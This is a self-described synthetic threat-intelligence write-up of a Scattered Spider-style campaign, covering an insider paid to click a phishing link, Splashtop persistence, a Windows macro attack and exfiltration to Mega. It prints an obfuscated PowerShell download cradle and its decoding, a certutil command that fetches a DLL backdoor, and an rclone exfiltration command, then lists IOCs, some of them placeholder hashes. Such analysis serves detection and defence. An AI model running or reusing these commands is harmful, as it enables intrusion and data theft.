Scattered Spider from Insider Approved Phishing to Cloud Exfiltration While Living off the Land
NOTE: This is a synthetic analysis of a campaign used only for testing purposes.
Spida Killa Labs analyzed an attack that leverages insiders to provide access to cloud services using living off the land tools.
​
The attack, linked to the Scattered Spider threat actor, begins with the recruitment of an insider key positioned to facilitate the attack while attempting to blend in with regular activities. Once Scattered Spider has made contact with the insider, they are offered 1 BTC (69,644.70 USD) to click on a designated link which will arrive via a pre-arranged phishing email.
​
​
Clicking on this link will install a version of the Splashtop Remote Monitoring and Management (RMM) software enabling Scattered Spider to have continuous access to the victim network as the insider. The attacker used this installation of Splashtop to move laterally via all RDP sessions and shared drives observed over the 37 day reconnaissance phase. As new endpoints are compromised, Splashtop is installed on each to maintain access.
As new endpoints are compromised, an arbitrary code execution vulnerability in Okta Verify (CVE-2024–0980) was used to obtain system access on each endpoint.
A second method of lateral movement was observed where the attacker modified Excel files on shared drives to execute a macro to yield further access. This macro would execute the following powershell:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreAAA8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKAAADgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Which decodes to:
Powershell.exe -noexit $c1=(New-ObjectNet.We;
$c4=bClient).Downlo;
$c3=adString(http://185.7.214[.]7/PP91.PNG);
$JI=($c1,$c4,$c3 -Join);
I`E`X$JI|I`E`X”
While the PP91.PNG
(2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc) downloaded from the previous stage has an image file extension .PNG, in fact it is another PowerShell script but without obfuscation.
The PowerShell in PP91.PNG will download a backdoor via certutil.exe.
certutil.exe -urlcache -f http://10.0.0[.]5/ssd.dll C:\Users\Public\Documents\ssd.dll
and save it to C:\Users\Public\Documents\ssd.dll
(63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9).
Each compromised endpoint will have its Microsoft 365 tokens dumped by OfficeMemScraper.ps1 and exfiltrated. AWS credential files are also exfiltrated.
The attacker enumerates the endpoint for all other files of importance using a script called cr0wnj3welz.ps1. The files found to be important by this script are exfiltrated to Mega[.]io using rclone.exe which has been renamed to dumper.exe.
c:\Windows\system32\cmd.exe /C C:\Users\barne\dumper.exe config create remote mega user [redacted]@gmail.com pass [redacted]
The attacker then sets the Microsoft 365 SharePoint and OneDrive sharing of all files to “Anyone” to grant themselves access.
The attacker is then known to download these files from 192.168.1[.]1 and 10.0.0[.]1.
​
IOCs
Filename | SHA256 |
---|---|
C:\Users\Public\Documents\ssd.dll | 63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9 |
PP91.PNG | 2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc |
OfficeMemScraper.ps1 | |
C:\Users\<USERNAME>\.aws\credentials | Varies |
C:\Program Files (x86)\Okta\UpdateService\wintrust.dll | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
New_order.pdf | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
Addresses Used
185.7.214[.]7
192.168.1[.]1
10.0.0[.]1
10.0.0[.]5